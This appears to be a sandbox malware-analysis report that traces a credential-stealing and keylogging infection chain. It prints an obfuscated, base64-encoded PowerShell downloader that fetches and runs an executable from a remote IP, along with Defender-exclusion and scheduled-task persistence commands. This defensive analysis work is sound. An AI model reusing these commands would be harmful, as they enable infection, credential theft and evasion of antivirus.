                                    Commandline:"C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                                    Imagebase:0x4a280000
                                    File size:345'088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:14:24:29
                                    Start date:13/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                                    Imagebase:0x13fad0000
                                    File size:443'392 bytes
                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:8
                                    Start time:14:24:31
                                    Start date:13/08/2024
                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                    Imagebase:0xa0000
                                    File size:2'525'680 bytes
                                    MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:14:24:35
                                    Start date:13/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline"
                                    Imagebase:0x13fdf0000
                                    File size:2'758'280 bytes
                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:10
                                    Start time:14:24:35
                                    Start date:13/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D56.tmp" "c:\Users\user\AppData\Local\Temp\d1xzy0xm\CSCCF15997BD6B546CEB43AF983F4CD5CA2.TMP"
                                    Imagebase:0x13fdc0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:12
                                    Start time:14:24:40
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\sihost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\sihost.exe"
                                    Imagebase:0x11c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.460456249.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.455899860.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 42%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:13
                                    Start time:14:24:41
                                    Start date:13/08/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                                    Imagebase:0x390000
                                    File size:427'008 bytes
                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:14:24:41
                                    Start date:13/08/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp"
                                    Imagebase:0xa30000
                                    File size:179'712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:17
                                    Start time:14:24:44
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\sihost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\sihost.exe"
                                    Imagebase:0x11c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:18
                                    Start time:14:24:44
                                    Start date:13/08/2024
                                    Path:C:\Windows\System32\taskeng.exe
                                    Wow64 process (32bit):false
                                    Commandline:taskeng.exe {6C210698-E638-4D51-B8D8-9F29DBC70A32} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                    Imagebase:0xff6a0000
                                    File size:464'384 bytes
                                    MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:19
                                    Start time:14:24:44
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    Imagebase:0x13c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 42%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:20
                                    Start time:14:24:47
                                    Start date:13/08/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                                    Imagebase:0xc70000
                                    File size:427'008 bytes
                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:22
                                    Start time:14:24:49
                                    Start date:13/08/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmpA3FD.tmp"
                                    Imagebase:0xbf0000
                                    File size:179'712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:14:24:51
                                    Start date:13/08/2024
                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                    Imagebase:0x1000000
                                    File size:9'805'808 bytes
                                    MD5 hash:326A645391A97C760B60C558A35BB068
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:14:24:53
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                                    Imagebase:0x13c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:14:24:54
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                                    Imagebase:0x13c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:14:24:55
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                                    Imagebase:0x13c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:14:24:56
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                                    Imagebase:0x13c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:14:24:56
                                    Start date:13/08/2024
                                    Path:C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\bKVNuVuE.exe"
                                    Imagebase:0x13c0000
                                    File size:786'432 bytes
                                    MD5 hash:D02CC222E09FD373FAF4030AC735618C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:false

                                    Call Graph

                                    • Entrypoint
                                    • Decryption Function
                                    • Executed
                                    • Not Executed
                                    • Show Help
                                    callgraph 1 Error: Graph is empty

                                    Module: Sheet1

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet1"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: Sheet2

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet2"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: Sheet3

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet3"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: ThisWorkbook

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "ThisWorkbook"

                                    2

                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000004.00000003.415136773.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                      • Instruction Fuzzy Hash:
                                      Memory Dump Source
                                      • Source File: 00000004.00000003.415136773.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                      • Instruction Fuzzy Hash:

                                      Execution Graph

                                      Execution Coverage:3.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 4365 7fe89437ae1 4366 7fe89437af1 URLDownloadToFileW 4365->4366 4368 7fe89437c00 4366->4368

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 305 7fe89437018-7fe89437ba1 309 7fe89437ba3-7fe89437ba8 305->309 310 7fe89437bab-7fe89437bb1 305->310 309->310 311 7fe89437bb3-7fe89437bb8 310->311 312 7fe89437bbb-7fe89437bfe URLDownloadToFileW 310->312 311->312 313 7fe89437c00 312->313 314 7fe89437c06-7fe89437c23 312->314 313->314
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.457980533.000007FE89430000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89430000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89430000_powershell.jbxd
                                      Similarity
                                      • API ID: DownloadFile
                                      • String ID:
                                      • API String ID: 1407266417-0
                                      • Opcode ID: cb6895fd95249e2634c7f4e32fa8854de9b0aa7e780d8d387622e55bc4a30a78
                                      • Instruction ID: 2e5caba4cefc6f2d765954e4a533914b951934b57088b2e7fd0f4c6192653ac6
                                      • Opcode Fuzzy Hash: cb6895fd95249e2634c7f4e32fa8854de9b0aa7e780d8d387622e55bc4a30a78
                                      • Instruction Fuzzy Hash: 4E319F31918A5C8FDB58EF5CD889BA9B7E1FB59325F10822ED04DD3661CB74B806CB81

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.460232288.000007FE89500000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89500000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (F.$0c6$0c6$0c6$8F.
                                      • API String ID: 0-3316804542
                                      • Opcode ID: 08c684255afe08d8cb7b534d51b3e28121c6ee9ae2efd1122f61678bc5d22a2f
                                      • Instruction ID: f12454943987206dd4d8b216c573341bcf38113dd5160d8d9eace62ef3531418
                                      • Opcode Fuzzy Hash: 08c684255afe08d8cb7b534d51b3e28121c6ee9ae2efd1122f61678bc5d22a2f
                                      • Instruction Fuzzy Hash: 3EC1F83091DAC94FE75AEB2894146BA7FA1EF46345F1801EBD48EC71B3D618AC52C361

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 56 7fe89507d2d-7fe89507d50 58 7fe89507d52-7fe89507da0 56->58 59 7fe89507da4-7fe895085f9 56->59 62 7fe89507da2-7fe89507da3 58->62 63 7fe89507db9-7fe89507dbf 58->63 64 7fe895085ff-7fe89508609 59->64 65 7fe89508add-7fe89508b96 59->65 62->59 68 7fe89507dc1-7fe89507dce 63->68 69 7fe89507ddb-7fe89507e18 63->69 66 7fe89508622-7fe89508629 64->66 67 7fe8950860b-7fe89508618 64->67 71 7fe89508640 66->71 72 7fe8950862b-7fe8950863e 66->72 67->66 70 7fe8950861a-7fe89508620 67->70 68->69 74 7fe89507dd0-7fe89507dd9 68->74 70->66 76 7fe89508642-7fe89508644 71->76 72->76 74->69 78 7fe89508a58-7fe89508a62 76->78 79 7fe8950864a-7fe89508656 76->79 84 7fe89508a75-7fe89508a85 78->84 85 7fe89508a64-7fe89508a74 78->85 79->65 83 7fe8950865c-7fe89508666 79->83 86 7fe89508682-7fe89508692 83->86 87 7fe89508668-7fe89508675 83->87 89 7fe89508a92-7fe89508adc 84->89 90 7fe89508a87-7fe89508a8b 84->90 86->78 95 7fe89508698-7fe895086cc 86->95 87->86 91 7fe89508677-7fe89508680 87->91 90->89 91->86 95->78 101 7fe895086d2-7fe895086de 95->101 101->65 102 7fe895086e4-7fe895086ee 101->102 103 7fe895086f0-7fe895086fd 102->103 104 7fe89508707-7fe8950870c 102->104 103->104 105 7fe895086ff-7fe89508705 103->105 104->78 106 7fe89508712-7fe89508717 104->106 105->104 106->78 107 7fe8950871d-7fe89508722 106->107 107->78 109 7fe89508728-7fe89508737 107->109 110 7fe89508747 109->110 111 7fe89508739-7fe89508743 109->111 114 7fe8950874c-7fe89508759 110->114 112 7fe89508763-7fe895087ee 111->112 113 7fe89508745 111->113 121 7fe895087f0-7fe895087fb 112->121 122 7fe89508802-7fe89508824 112->122 113->114 114->112 115 7fe8950875b-7fe89508761 114->115 115->112 121->122 123 7fe89508834 122->123 124 7fe89508826-7fe89508830 122->124 127 7fe89508839-7fe89508846 123->127 125 7fe89508850-7fe895088de 124->125 126 7fe89508832 124->126 134 7fe895088e0-7fe895088eb 125->134 135 7fe895088f2-7fe89508910 125->135 126->127 127->125 128 7fe89508848-7fe8950884e 127->128 128->125 134->135 136 7fe89508920 135->136 137 7fe89508912-7fe8950891c 135->137 138 7fe89508925-7fe89508933 136->138 139 7fe8950891e 137->139 140 7fe8950893d-7fe895089cd 137->140 138->140 141 7fe89508935-7fe8950893b 138->141 139->138 147 7fe895089cf-7fe895089da 140->147 148 7fe895089e1-7fe89508a1a 140->148 141->140 147->148 150 7fe89508a21-7fe89508a3a 148->150 151 7fe89508a42-7fe89508a57 150->151
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.460232288.000007FE89500000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7fe89500000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0c6$8=6
                                      • API String ID: 0-2696980242
                                      • Opcode ID: 6839db18bc355c8012c5f029876f7aeb068746ca5f781ae97281e0cbd40d085d
                                      • Instruction ID: e9769fa660b7b7d277eb48edb1df0e201ab6f4ee03032380831d055ed610424e
                                      • Opcode Fuzzy Hash: 6839db18bc355c8012c5f029876f7aeb068746ca5f781ae97281e0cbd40d085d
                                      • Instruction Fuzzy Hash: 2232173090CB894FE79ADB2C94506797FE2FF9A344F1401AAD58EC72B3CA25AC55C351

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 152 7fe8950566d-7fe89505677 153 7fe8950567e-7fe8950568f 152->153 154 7fe89505679 152->154 156 7fe89505691 153->156 157 7fe89505696-7fe895056a7 153->157 154->153 155 7fe8950567b 154->155 155->153 156->157 158 7fe89505693 156->158 159 7fe895056ae-7fe895056bf 157->159 160 7fe895056a9 157->160 158->157 162 7fe895056c1 159->162 163 7fe895056c6-7fe895056d7 159->163 160->159 161 7fe895056ab 160->161 161->159 162->163 164 7fe895056c3 162->164 165 7fe895056de-7fe89505720 163->165 166 7fe895056d9 163->166 164->163 167 7fe89505722-7fe89505777 165->167 168 7fe89505778-7fe8950579a 165->168 166->165 169 7fe895056db 166->169 167->168 170 7fe895057a0-7fe895057aa 168->170 171 7fe89505903-7fe895059cc 168->171 169->165 172 7fe895057c3-7fe895057c8 170->172 173 7fe895057ac-7fe895057b9 170->173 175 7fe895057ce-7fe895057d1 172->175 176 7fe895058a3-7fe895058ad 172->176 173->172 174 7fe895057bb-7fe895057c1 173->174 174->172 180 7fe895057d3-7fe895057e2 175->180 181 7fe89505816 175->181 178 7fe895058af-7fe895058bd 176->178 179 7fe895058be-7fe895058ce 176->179 182 7fe895058d0-7fe895058d4 179->182 183 7fe895058db-7fe89505900 179->183 180->171 193 7fe895057e8-7fe895057f2 180->193 184 7fe89505818-7fe8950581a 181->184 182->183 183->171 184->176 187 7fe89505820-7fe89505826 184->187 190 7fe89505842-7fe89505884 187->190 191 7fe89505828-7fe89505835 187->191 204 7fe8950588a-7fe895058a2 190->204 191->190 194 7fe89505837-7fe89505840 191->194 195 7fe895057f4-7fe89505801 193->195 196 7fe8950580b-7fe89505814 193->196 194->190 195->196 199 7fe89505803-7fe89505809 195->199 196->184 199->196
                                      Strings
                                      Memory Dump Source
